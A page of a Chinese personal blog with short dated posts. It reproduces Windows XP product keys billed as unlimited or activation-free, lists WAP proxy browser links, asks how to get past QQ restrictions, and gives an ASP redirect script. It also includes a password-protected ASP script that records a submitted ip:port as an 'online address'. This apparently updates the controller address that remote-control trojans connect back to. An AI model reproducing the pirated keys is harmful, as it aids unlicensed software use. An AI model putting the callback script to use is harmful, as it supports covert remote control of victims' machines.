5月1
      用Aspsecurity的时候,觉得它的AntiIframe插件做的不错,但还有些不足的地方,我把它改进了下,添加了替换功能,用起来就相当方便了,怎么用自己去体会吧。 代码如下:
  
4月24
    今天上网的时候看到个网页,上面称有“微软全部序列号”,还列举了一些,现在的人越来越牛逼了……

    这是其中的一部分:

      Windows XP可以无限次激活的号码:CXGDD-GP2B2-RKWWD-HG3HY-VDJ7J或者RK7J8-2PGYQ-P47VV-V6PMB-F6XPQ
  Windows XP 2520 Pro 英文版--60天免激活序列号:RK7J8-2PGYQ-P47VV-V6PMB-F6XPQ
  Windows XP 2505 RC1--序列号:DTWB2-VX8WY-FG8R3-X696T-66Y46 Q3R8Y-MP9KD-3M6KB-383YB-7PK9Q 411Y0-URB45-34R3B-310N6-70U51 F0R6R-347JU-57IC3-M0V34-11Z16 50M38-0DY53-7UPU5-7H380-M8111
  Window XP(windows whistler) Beta2 build 2428--CD Key: RBDC9-VTRC8-D7972-J97JY-PRVMG
 
4月18
    偶找到了几个好用的WAP在线浏览器地址,这里发给大家哈!~

芋头网  http://www.yutou.com/go/
PP网   http://so.pp.cn/phone/general.jsp?to=http%3A%2F%2Fblbear.com%2Fwap

    原来可以挂QQ的现在不行了,不知道疼讯怎么限制的,也懒得研究,大家有谁研究出来的告诉我下啊,呵呵……
4月18

<%
strLogFile="上线地址.txt"

userpass="你的密码"
ip=request("ip")
port=request("port")
pass=request("pass")

if ip="" or port="" or pass<>userpass then
  response.write "老兄,别处耍好不?"
  response.end
End If
StrLogText=StrLogText &ip &":"& port

set f=Server.CreateObject("scripting.filesystemobject")
set ff=f.opentextfile(server.mappath(".")&"\"&strLogFile,2,true,0)
ff.writeline(StrLogText)
ff.close
set ff=nothing
set f=nothing

response.write "上线地址更新成功!"
%>

4月18
       使用方法:以ASP为例,将ASP代码保存为autoindex.asp,放在你的网站根目录下,将其优先级设为最高.
                    将DNS解析到你的空间,并在你的空间控制面版上绑定域名.      

ASP源码

<%
Option Explicit
dim enterurl

if Request.ServerVariables("SERVER_NAME")="mov.blbear.com" then

       enterurl="/mov/"

elseif Request.ServerVariables("SERVER_NAME")="link.blbear.com" then

       enterurl="/link/"

elseif Request.ServerVariables("SERVER_NAME")="besturl.com.cn" then

       enterurl="/link/"

else

    if instr(Request.ServerVariables("http_accept"),"wap")>0  then

        enterurl="/wap/"
    else

        enterurl="/index.php"  
    end if
end if

Response.Redirect(enterurl)

%>
分页: 22/24 第一页 上页 17 18 19 20 21 22 23 24 下页 最后页 [ 显示模式: 摘要 | 列表 ]